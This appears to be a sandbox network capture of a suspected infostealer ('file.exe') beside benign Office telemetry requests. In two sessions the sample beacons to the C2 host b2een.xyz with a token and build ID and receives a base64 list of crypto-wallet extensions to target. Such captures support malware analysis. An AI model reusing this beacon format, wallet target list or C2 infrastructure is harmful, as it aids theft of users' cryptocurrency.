2024-11-25 10:33:28 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.5	49738	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:28 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:28 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: 6ea5360a-801e-002a-4904-3e31dc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103328Z-178bfbc474bh5zbqhC1NYCkdug000000079g00000000545r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:28 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.5	49739	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:28 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:29 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:28 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: c49e358a-d01e-008e-6463-3b387a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103328Z-178bfbc474bw8bwphC1NYC38b4000000076g000000004f8r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:29 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49740	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:29 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIDAAFBGDBKJJJKFIIIJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:33:29 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 64 34 35 36 37 31 63 63 33 31 61 66 37 61 36 39 34 30 64 65 39 35 63 32 33 33 33 32 64 61 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 65 34 66 32 64 65 63 31 34 32 38 30 30 39 66 38 62 63 37 35 35 65 38 33 61 32 31 64 31 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------IIDAAFBGDBKJJJKFIIIJContent-Disposition: form-data; name="token"6d45671cc31af7a6940de95c23332da3------IIDAAFBGDBKJJJKFIIIJContent-Disposition: form-data; name="build_id"93e4f2dec1428009f8bc755e83a21d1b------IIDAAFBGDBKJJJKFIIIJCont
2024-11-25 10:33:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:33:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 10:33:30 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.5	49742	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:30 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:30 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 6a83a5f2-e01e-000c-157b-3b8e36000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103330Z-178bfbc474bq2pr7hC1NYCkfgg00000007eg0000000077s4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:30 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.5	49743	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:30 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:30 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 876f21bf-101e-007a-0bbf-3e047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103330Z-178bfbc474bpscmfhC1NYCfc2c00000005z0000000003q51 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:30 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.5	49741	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:30 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:30 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: aaf2b452-f01e-0071-621c-3e431c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103330Z-178bfbc474bmqmgjhC1NYCy16c00000007c00000000070bh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:30 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.5	49744	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:30 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:30 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: ef3fb90e-201e-003c-18e1-3e30f9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103330Z-174c587ffdfdwxdvhC1TEB1c4n00000005u00000000038r5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:31 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.5	49745	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:31 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:31 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:31 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: ea8695b1-901e-002a-7283-3b7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103331Z-174c587ffdfmrvb9hC1TEBtn3800000005vg0000000064kn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-25 10:33:31 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49746	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:31 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHDHJJJECFIECBGDGCAA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:33:31 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 64 34 35 36 37 31 63 63 33 31 61 66 37 61 36 39 34 30 64 65 39 35 63 32 33 33 33 32 64 61 33 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 65 34 66 32 64 65 63 31 34 32 38 30 30 39 66 38 62 63 37 35 35 65 38 33 61 32 31 64 31 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 0d 0a 43 6f 6e 74 Data Ascii: ------DHDHJJJECFIECBGDGCAAContent-Disposition: form-data; name="token"6d45671cc31af7a6940de95c23332da3------DHDHJJJECFIECBGDGCAAContent-Disposition: form-data; name="build_id"93e4f2dec1428009f8bc755e83a21d1b------DHDHJJJECFIECBGDGCAACont
2024-11-25 10:33:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:33:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 10:33:32 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.5	49747	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:32 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:32 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:32 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 2160d4c7-701e-0021-5913-3d3d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103332Z-178bfbc474bp8mkvhC1NYCzqnn000000074g000000007fpp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:32 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.5	49748	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:32 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:33 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:32 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: 413a5bf0-401e-0035-1ab5-3e82d8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103332Z-178bfbc474b9fdhphC1NYCac0n000000076g000000008ts2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
